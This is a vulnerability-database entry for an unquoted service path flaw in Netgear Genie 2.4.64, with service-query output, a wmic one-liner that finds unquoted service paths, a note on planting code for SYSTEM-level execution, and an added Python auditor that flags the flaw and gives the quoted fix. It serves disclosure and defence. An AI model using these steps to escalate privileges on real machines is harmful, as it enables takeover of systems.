ID

VAR-E-202110-0176


TITLE

Netgear Genie 2.4.64 Unquoted Service Path

Trust: 0.5

sources: PACKETSTORM: 164607

DESCRIPTION

Netgear Genie version 2.4.64 suffers from an unquoted service path vulnerability.

Trust: 0.5

sources: PACKETSTORM: 164607

AFFECTED PRODUCTS

vendor: netgear, model: genie, scope: eq, version: 2.4.64

Trust: 0.5

sources: PACKETSTORM: 164607

EXPLOIT

# Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path
# Exploit Author: Mert DAŞ
# Version: 2.4.64
# Date: 23.10.2021
# Vendor Homepage: https://www.netgear.com/
# Tested on: Windows 10

C:\Users\Mert>sc qc NETGEARGenieDaemon
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NETGEARGenieDaemon
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGEARGenieDaemon
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Or:
-------------------------
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

#Exploit:

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.
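
A defender-side check for the condition shown above, as an added example (not part of the original advisory and not Netgear's code): it parses `sc qc` output, reports whether BINARY_PATH_NAME is unquoted and contains spaces, lists the shorter paths Windows may resolve first so that write permissions on their directories can be reviewed, and gives the quoted form to set. The function names and the embedded sample are constructed here, and the executable is assumed to end in .exe.

```python
import re

# Constructed sample: the `sc qc` output from this entry, with the wrapped
# BINARY_PATH_NAME value joined back onto one line.
SAMPLE_SC_QC = r"""
SERVICE_NAME: NETGEARGenieDaemon
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe
        SERVICE_START_NAME : LocalSystem
"""

def binary_path(sc_qc_output):
    """Return the BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", sc_qc_output, re.M)
    return m.group(1) if m else None

def split_exe(image_path):
    """Split a command line into (executable, arguments).

    Assumption: the executable part ends at the first ".exe".
    """
    m = re.match(r"(.+?\.exe)(?=\s|$)(.*)", image_path, re.I)
    return (m.group(1), m.group(2)) if m else (image_path, "")

def ambiguous_prefixes(image_path):
    """Shorter paths Windows may try first when the path is unquoted.

    Returns [] for a quoted path or an executable path without spaces.
    """
    if image_path.startswith('"'):
        return []
    parts = split_exe(image_path)[0].split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def audit(sc_qc_output):
    """Summarise one service: path, finding, locations to review, fixed value."""
    path = binary_path(sc_qc_output)
    prefixes = ambiguous_prefixes(path) if path else []
    fix = path
    if prefixes:
        exe, args = split_exe(path)
        fix = '"' + exe + '"' + args  # quote only the executable, keep arguments
    return {"path": path, "unquoted": bool(prefixes),
            "check_first": prefixes, "fix": fix}

if __name__ == "__main__":
    for key, value in audit(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```
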

Trust: 0.5

sources: PACKETSTORM: 164607

EXPLOIT HASH

LOCAL

SOURCE

md5: cfe43ceba8f9996b699d361f196538db
sha-1: c065ca15ce84e47e914eda953c07acb8bbcdde0b
sha-256: bab104f6c9713f20e72527147150a4ac666acd64cb8edf7929452579dd7088e9

Trust: 0.5

sources: PACKETSTORM: 164607

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 164607

TAGS

tag:exploit

Trust: 0.5

sources: PACKETSTORM: 164607

CREDITS

Mert Das

Trust: 0.5

sources: PACKETSTORM: 164607

EXTERNAL IDS

db: PACKETSTORM, id: 164607

Trust: 0.5

sources: PACKETSTORM: 164607

SOURCES

db: PACKETSTORM, id: 164607

LAST UPDATE DATE

2022-07-27T09:29:24.970000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM, id: 164607, date: 2021-10-25T16:19:20